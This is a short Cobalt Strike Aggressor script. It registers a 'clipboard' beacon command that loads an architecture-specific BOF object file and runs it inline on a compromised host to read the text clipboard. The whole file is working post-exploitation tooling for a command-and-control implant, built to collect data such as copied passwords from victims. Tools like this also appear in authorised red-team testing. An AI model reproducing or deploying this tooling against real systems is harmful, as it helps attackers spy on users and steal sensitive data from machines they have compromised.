alias clipboard {
	local('$barch $handle $data');
	
	# figure out the arch of this session
	$barch  = barch($1);
	
	# read in the right BOF file
	$handle = openf(script_resource("clipboard. $+ $barch $+ .o"));
	$data = readb($handle, -1);
	closef($handle);

	# announce what we're doing
	btask($1, "Tasked beacon to get clipboard contents");
	
	# execute it.
	beacon_inline_execute($1, $data, "getclip", $null);
}

beacon_command_register(
"clipboard", 
"Attempt to get text clipboard contents", 
"Use: clipboard\n\nAttempts to get text clipboard contents");